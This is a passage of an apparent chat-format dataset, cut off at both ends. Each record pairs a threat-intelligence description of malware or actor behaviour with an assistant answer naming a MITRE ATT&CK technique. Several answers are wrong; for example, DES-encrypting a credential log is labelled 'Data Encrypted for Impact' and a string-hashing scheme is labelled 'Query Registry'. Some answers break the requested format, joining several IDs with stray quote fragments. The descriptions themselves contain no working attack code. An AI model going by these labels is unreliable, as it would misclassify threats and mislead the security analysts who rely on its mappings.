binds and listens on port 443 with a FakeTLS method." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec harvests plain-text credentials as a password filter registered on domain controllers." }, { "role": "assistant", "content": "T1556.002 - Modify Authentication Process: Password Filter DLL" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has used PowerShell scripts to access credential data." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has created a run key named \"Dropbox Update Setup\" to mask a persistence mechanism for a malicious binary." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo can collect screenshots of the victim’s machine." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak has downloaded a variety of modules and payloads to the compromised host, including IcedID and Ursnif." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Truvasys adds a Registry Run key to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Linux Rabbit opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax." }, { "role": "assistant", "content": "T1014 - Rootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTP for C2 communication." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used the \"Get-ManagementRoleAssignment\" PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs collects a list of running services with the command \"tasklist /svc\"." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers." }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Python script was created for the purpose of automating this configuration file decoding process. The output of this script when run against the configuration file used by the first of the two Parliamentarian operation samples yielded the following data" }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Many of the Fetch samples we analyzed attempted to obfuscate their functionality by encrypting their embedded strings using AES" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM can obtain the username from the victim's machine." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon further inspection, Kroll learned that an employee using their work computer had clicked on a malicious link from their personal email account that downloaded a Qakbot dropper" }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When we deploy any web browser, it directly injects the code into its process and deploys illegitimate connections.It is the way to keep in touch with the C&C, monitor user’s activity and steal credentials" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it" }, { "role": "assistant", "content": "T1072 - Software Deployment Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can set its Beacon payload to reach out to the C2 server on an arbitrary and random interval." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can add or remove applications or ports on the Windows firewall or disable it entirely." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The following functions are called when the application attempts to initialize the menu:ETransaksi.Speed(); // Legitimate class, but method is the first wrapped function that leads to malicious code ProjectData.EndApp(); // Closes the application before rest of legitimate Sales System Application functions are calledThe “Speed” method in the legitimate ETransaksi class contains legitimate code from the Sales System Application; however, the author of this tool includes this code in an if/else construct that bypasses these instructions by setting a false flag to skip the legitimate code and execute the next step to the malicious code" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1036 - Masquerading', 'T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1189 - Drive-by Compromise" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "email with an embedded tracking link" }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has obtained exploit code for various CVEs." }, { "role": "assistant", "content": "T1588.005 - Exploits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker can enumerate removable drives prior to the encryption process." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "With the upsurgence of ProxyShell, webshells have become more common entry points." }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell', 'T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Honeybee's service-based DLL implant can execute a downloaded file with parameters specified using \"CreateProcessAsUser\"." }, { "role": "assistant", "content": "T1546.009 - Event Triggered Execution: AppCert DLLs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can request to delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BokBot achieves malicious payload execution by abusing a renamed copy of the legitimate WMIC utility, which will execute a XSL script file. The entire process is outlined below." }, { "role": "assistant", "content": "T1220 - XSL Script Processing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has a tool that can enumerate the permissions associated with Windows groups." }, { "role": "assistant", "content": "T1069 - Permission Groups Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used an audio capturing utility known as SOUNDWAVE that captures microphone input." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WIRTE has used `regsvr32.exe` to trigger the execution of a malicious script." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used a custom hashing method to resolve APIs used in shellcode." }, { "role": "assistant", "content": "T1027.007 - Obfuscated Files or Information: Dynamic API Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Moses Staff has built malware, such as DCSrv and PyDCrypt, for targeting victims' machines." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IcedID has been delivered via phishing e-mails with malicious attachments." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore has disguised a malicious .app file as a Flash Player update." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DRATzarus can collect information from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user. GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]’s S4USelf + User to User Kerberos Authentication. GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat. GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR. ticketConverter.py: This script will convert kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa. raiseChild.py: This script implements a child-domain to forest privilege escalation by (ab)using the concept of Golden Tickets and ExtraSids" }, { "role": "assistant", "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Koadic can gather hashed passwords by dumping SAM/SECURITY hive." }, { "role": "assistant", "content": "T1003.002 - OS Credential Dumping: Security Account Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of accessing locally stored passwords on victims." }, { "role": "assistant", "content": "T1552.001 - Unsecured Credentials: Credentials In Files" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AuTo Stealer can store collected data from an infected host to a file named `Hostname_UserName.txt` prior to exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username - IP Address from Network Adapter Configuration - OS Name - OS Architecture - Computer Name - Computer Domain Name - Username" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1082 - System Information Discovery', 'T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa exfiltrates data from a supplied path over its C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex loads \"injecthelper.dll\" into a newly created \"rundll32.exe\" process." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ragnar Locker has attempted to terminate/stop processes and services associated with endpoint security products." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver continues to collect various information from the victim machine, including the following: Computer name Volume serial number Microsoft Windows version CPU speed ANSI code page OEM code page identifier for the operating system Physical and virtual memory information Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious link." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials." }, { "role": "assistant", "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POORAIM can enumerate processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has used shell scripts for execution." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All this information was then sent to one of the following domains: G1 also had the ability to execute commands remotely on the infected host machine at the author's will" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Below is an example of anti-analysis technique showing the loader checking if the victim system is a Vmware or VirtualBox VM" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to command-and-control (C&C) servers" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The loaded module is a simple dropper. Upon loading the module, the AutoOpen method will be invoked. The malicious code in this method drops the final payload executable into %AppData%\\service.exe and executes it (see Figure 6)" }, { "role": "assistant", "content": "T1574.005 - Executable Installer File Permissions Weakness', 'T1574 - Hijack Execution Flow', 'T1569.002 - System Services: Service Execution', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Adds newly created accounts to the administrators group to maintain elevated access." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Peppy can take screenshots on targeted systems." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors used two Impacket tools: wmiexec.py and smbexec.py." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It then launches player.exe, a CozyDuke dropper maintaining anti-detection techniques: 3d3363598f87c78826c859077606e514,player.exe,338kb,Trojan.Win32.CozyBear.v,CompiledOn:2014.07.02 21:13:33 Anti-detection and trojan functionality The file collects system information, and then invokes a WMI instance in the root\\securitycenter namespace to identify security products installed on the system, meaning that this code was built for x86 systems, wql here: SELECT * FROM AntiVirusProduct SELECT * FROM FireWallProduct The code hunts for several security products to evade: CRYSTAL KASPERSKY SOPHOS DrWeb AVIRA COMODO Dragon In addition to the WMI/wql use, it also hunts through the “SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\” registry key looking for security products to avoid" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has established email accounts using fake personas for spearphishing operations." }, { "role": "assistant", "content": "T1585.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FELIXROOT collects a list of running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. This hash is combined with a DWORD using a simple XOR. This string hashing algorithm is identical to the hashing algorithm used in other Dridex modules" }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA can enumerate open ports on a victim machine." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used certutil in a macro to decode base64-encoded content contained in a dropper document attached to an email. The group has also used \"certutil -decode\" to decode files on the victim’s machine when dropping UPPERCUT." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Iranian attacker group (APT35) and the Chinese attacker group (APT31) targeted campaign staffers’ personal emails with credential phishing emails and emails containing tracking links. As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns" }, { "role": "assistant", "content": "T1598 - Phishing for Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Winnti for Windows can check for the presence of specific files prior to moving to the next phase of execution." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used a AMSI bypass, which patches the in-memory amsi.dll, in PowerShell scripts to bypass Windows antimalware products." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM can execute commands and scripts through rundll32." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has searched for rival malware and removes it if found. TeamTNT has also searched for running processes containing the strings aliyun or liyun to identify machines running Alibaba Cloud Security tools." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PROMETHIUM has used a script that configures the knockd service and firewall to only accept C2 connections from systems that use a specified sequence of knock ports." }, { "role": "assistant", "content": "T1205.001 - Port Knocking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ProLock can use BITS jobs to download its malicious payload." }, { "role": "assistant", "content": "T1197 - BITS Jobs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After downloading and executing these files, one of the child processes created other files and the executable setup.exe/setup-installv1.3.exe, which was extracted from 320yea_Teamviewer_15206.zip via WinRAR.exe. This file seems to be the source of most of the downloaded malicious files, as seen in the following figure." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The URIs used in the HTTP requests are randomly generated" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DES-encrypts captured credentials using the key 12345678 before writing the credentials to a log file." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sent shortened URL links over email to victims. The URLs linked to Word documents with malicious macros that execute PowerShells scripts to download Pupy." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink has the ability to execute on device startup, using a modified RC script named S51armled." }, { "role": "assistant", "content": "T1037.004 - Boot or Logon Initialization Scripts: Rc.common" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used HTTP for C2 and data exfiltration." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RAT is able to open a command shell." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": 